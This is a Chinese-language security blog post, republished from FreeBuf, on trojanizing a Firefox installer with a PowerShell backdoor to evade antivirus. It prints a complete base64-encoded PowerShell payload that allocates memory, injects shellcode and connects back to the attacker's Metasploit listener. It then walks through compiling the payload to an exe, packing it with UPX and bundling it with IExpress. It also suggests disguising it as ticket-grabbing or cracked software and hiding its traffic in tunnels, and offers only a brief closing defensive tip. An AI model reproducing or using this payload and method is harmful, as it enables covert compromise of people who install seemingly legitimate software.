内容简介:基于无文件攻击的思路利用 PowerShell 执行恶意代码的攻击频繁发生, Powershell 一时间成了恶意病毒的主战场,最近尝试了一种猥琐方式通过捆绑安装的方式将 Powshell 后门植入到软件安装包的方式绕过杀毒软件检测的方法。先在 Kali 下面生成一个 Powershell 的后门,通过编码的方式先进行简单的混淆。
*本文作者:si1ence,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。
前言
基于无文件攻击的思路利用 PowerShell 执行恶意代码的攻击频繁发生, Powershell 一时间成了恶意病毒的主战场,最近尝试了一种猥琐方式通过捆绑安装的方式将 Powshell 后门植入到软件安装包的方式绕过杀毒软件检测的方法。
0×1 制作后门
先在 Kali 下面生成一个 Powershell 的后门,通过编码的方式先进行简单的混淆。
生成的代码文件内容如下:
powershell -w 1 -C "sv wg -;sv kd ec;sv Kp ((gv wg).value.toString()+(gv kd).value.toString());powershell (gv Kp).value.toString() 'JABrAGwAIAA9ACAAJwAkAGUAVQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHQAaAAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGUAVQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABCAG4AIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADIALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB4ADQAOAAsADAAeAAwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADYAOQAsADAAeAA2AGUALAAwAHgANgA5ACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMwAxACwAMAB4AGQAYgAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgANQA2ACwAMAB4ADcAOQAsADAAeABhADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAYgBiACwAMAB4ADAAMQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4AGUAOAAsADAAeABiADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgBmACwAMAB4ADUANgAsADAAeAAzADQALAAwAHgAMwAxACwAMAB4ADQANAAsADAAeAA2AGQALAAwAHgANgBkACwAMAB4ADUANQAsADAAeAA0AGYALAAwAHgANgAzACwAMAB4ADcAYQAsADAAeAA3ADIALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAA2AGMALAAwAHgANAAyACwAMAB4ADQANgAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADQAMQAsADAAeAA0ADQALAAwAHgANgA3ACwAMAB4ADQANwAsADAAeAA2ADgALAAwAHgAMwAxACwAMAB4ADQAZgAsADAAeAA0AGUALAAwAHgAMAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgANQA3ACwAMAB4ADgAOQAsADAAeAA5AGYALAAwAHgAYwA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA5ACwAMAB4AGMANgAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAzADIALAAwAHgAZQAwACwAMAB4ADgANAAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAZQBiACwAMAB4ADUANQAsADAAeAAyAGUALAAwAHgAMwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA2ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANQBmACwAMAB4ADYAOAAsADAAeAA4ADAALAAwAHgAMwAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAOAA5ACwAMAB4AGUAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgAMQBmACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgANwA1ACwAMAB4ADQANgAsADAAeAA5AGUALAAwAHgAOAA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMgBkACwAMAB4ADAANgAsADAAeAAxADgALAAwAHgANwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAMQA2ACwAMAB4ADYAOAAsADAAeAA4ADgALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADQANAAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAYwBkACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADgAOQAsADAAeABlADcALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMQAyACwAMAB4ADkANgAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAYwBkACwAMAB4ADgAYgAsADAAeAAwADcALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADYAOQAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAzADgALAAwAHgAMwA0ACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwAzACwAMAB4ADMANAAsADAAeAAwADAAOwAkAG0AcQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABCAG4ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAbQBxACAAPQAgACQAQgBuAC4ATABlAG4AZwB0AGgAfQA7ACQAQgBuAE0APQAkAHQAaAA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAG0AcQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAEIATAA9ADAAOwAkAEIATAAgAC0AbABlACAAKAAkAEIAbgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABCAEwAKwArACkAIAB7ACQAdABoADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAQgBuAE0ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAQgBMACkALAAgACQAQgBuAFsAJABCAEwAXQAsACAAMQApAH0AOwAkAHQAaAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAQgBuAE0ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAG4AcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABrAGwAKQApADsAJABNAGUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQgBuAE0AdwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABCAG4ATQB3ACAAJABNAGUAIAAkAG4AcQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABNAGUAIAAkAG4AcQAiADsAfQA='"
生成的txt文件能被塞门铁克直接识别出来,真是强大。
然后将代码保存成 .bat 文件,之后通过编译的方式转化成 exe 文件,这样后门就制造好了。
假装给它加一个 UPX 的壳不能太明显了。
0×2 捆绑
这里下载了 Firefox 的安装文件作为载体与后门的 exe 文件使用 IExpress 进行组装成一个新的后门:
新生成的文件没有了以前的签名与描述信息当然这个可以随意更改无影响,文件大小也理所当然的有些出入。
通过压缩包的方式打开详细如下:
0×3 运行
运行此恶意软件首先和正常的安装火狐是一样的界面没有出入,安装完成之后会自动执行后门 exe 程序,调用本地的 Powershell 执行代码命令。
安装完成后查看本地的进程信息可以查看到进程树里面的启动顺序:
本地开启的 Metasploit 监听到 session:
使用杀毒软件做测试扫描,未检测出异常。
0×4 总结
1. 为了做的更真实一点可以用一些常用的应用软件比如火车票抢票软件、百度云盘破解版之类的补充好描述信息比较有迷惑性,通信方式也可以用一些隐蔽的隧道。
2. 日常下载软件的时候尽量选择官网下载或者可信的第三方平台,认真检查一下签名说不定后面藏了一个大惊喜什么勒索之类。
*本文作者:si1ence,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。
以上所述就是小编给大家介绍的《技术讨论 | 一种基于软件捆绑方式Bypass AV的思路》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 高级组合技打造捆绑后门及防御建议
- 基于Smali源码的安卓功能捆绑研究
- 百度软件中心版 PuTTY 被曝恶意捆绑软件
- 技术讨论 | 自动化Web渗透Payload提取技术
- 技术讨论 | 如何编写一段内存蠕虫?
- 技术讨论 | Largebin attack漏洞利用分析
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
